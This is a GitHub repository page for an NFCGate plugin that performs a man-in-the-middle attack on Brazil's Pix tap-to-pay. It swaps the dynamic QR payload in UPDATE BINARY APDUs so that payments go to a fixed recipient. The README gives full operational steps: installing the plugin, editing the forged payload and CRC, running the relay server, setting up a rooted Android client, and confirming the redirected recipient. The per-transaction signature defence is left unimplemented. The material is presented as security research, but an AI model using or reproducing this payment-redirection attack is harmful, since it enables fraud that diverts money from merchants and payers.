Skip to content
/ MITM-PixNFC Public

Technical article shows how a MITM attack against Pix tap-to-pay can swap the dynamic QR during APDU exchanges (UPDATE BINARY), silently redirecting payments without breaking crypto. We detail the flow, a PoC with NFCGate, CRC recalculation, and defenses: per-transaction signature, nonce, timestamp, counter, and strict AID/offset checks.

License

MIT license
10 stars 1 fork Branches Tags Activity
Star
Notifications You must be signed in to change notification settings

penegui/MITM-PixNFC

BranchesTags

Folders and files

NameName
Last commit message
Last commit date

Latest commit

 

History

2 Commits
LICENSE
LICENSE
 
 
README.md
README.md
 
 
mod_pixpatch.py
mod_pixpatch.py
 
 

Repository files navigation

NFCGate – mod_pixpatch Plugin

Goal: intercept Tap to Pix APDUs and replace the payload after qr= with a fixed Pix QR Code (CRC already included), enabling lab security testing.

Prerequisites

Item Minimum version Notes
Python 3.8+ NFCGate server
pip Up-to-date For optional dependencies
Android 8.0+ with root NFCGate client
NFCGate master branch client (APK) + server
Proxmark3 (optional) RDV4 Sniff analysis

⚠️ Strictly for educational use. Do not run in production environments without formal authorization.

1 · Cloning NFCGate

# Server
git clone https://github.com/nfcgate/nfcgate.git
cd nfcgate/server

# (Optional) create venv
python3 -m venv venv
source venv/bin/activate
pip install -r requirements.txt

2 · Adding the plugin

# Still inside nfcgate/server
mkdir -p plugins
cp /path/to/mod_pixpatch.py plugins/

The plugin must be saved exactly as plugins/mod_pixpatch.py.

3 · Configuring variables (optional)

You can tweak the fixed QR Code by editing the constants at the top of the file:

PREFIXO_QR = b"pix://BR.COM.PAGSEGURO?qr="
NOVO_PAYLOAD_PIX = (
    "000201...6304XXXX"
)

Tip: use python3 crc16.py <payload_without_crc> to recalculate field 6304 whenever you change the QR Code.

4 · Running the server with the plugin

python3 server.py --plugins pixpatch --host 0.0.0.0 --port 5566

Debug logs will appear in the terminal with the [DEBUG] prefix.

5 · Android client setup

  1. Install the NFCGate APK (local build or release).
  2. Grant root via Magisk/SuperSU.
  3. In settings, set Server URI to ws://<SERVER_IP>:5566.
  4. Enable the Man-in-the-Middle module and start capturing.

6 · Test flow

  1. Bring the payment terminal/POS close to the phone.
  2. Watch the log for commands D6 00 00 and D6 00 FA.
  3. Verify that the value after qr= was replaced with the fixed payload (field 6304 intact).
  4. Confirm in the Payer app that the recipient/amount matches the forged payload.

7 · Possible vulnerability mitigation

Need Where to change
Implement signature sig=<signature> TODO: generate a signature for each transaction attempt – not implemented

8 · Troubleshooting

Symptom Possible cause Solution
patched2 > 255 Large payload Reduce size or use extended APDU
Lc mismatch Wrong length Check len1 and new_lc calculations
App shows no transaction Incorrect CRC Recalculate 6304XXXX

9 · License & Ethics

This code is intended exclusively for security research. The author is not responsible for misuse.

About

Technical article shows how a MITM attack against Pix tap-to-pay can swap the dynamic QR during APDU exchanges (UPDATE BINARY), silently redirecting payments without breaking crypto. We detail the flow, a PoC with NFCGate, CRC recalculation, and defenses: per-transaction signature, nonce, timestamp, counter, and strict AID/offset checks.

Resources

Readme

License

MIT license
Activity

Stars

10 stars

Watchers

0 watching

Forks

1 fork
Report repository

Releases

No releases published

Packages

No packages published

Languages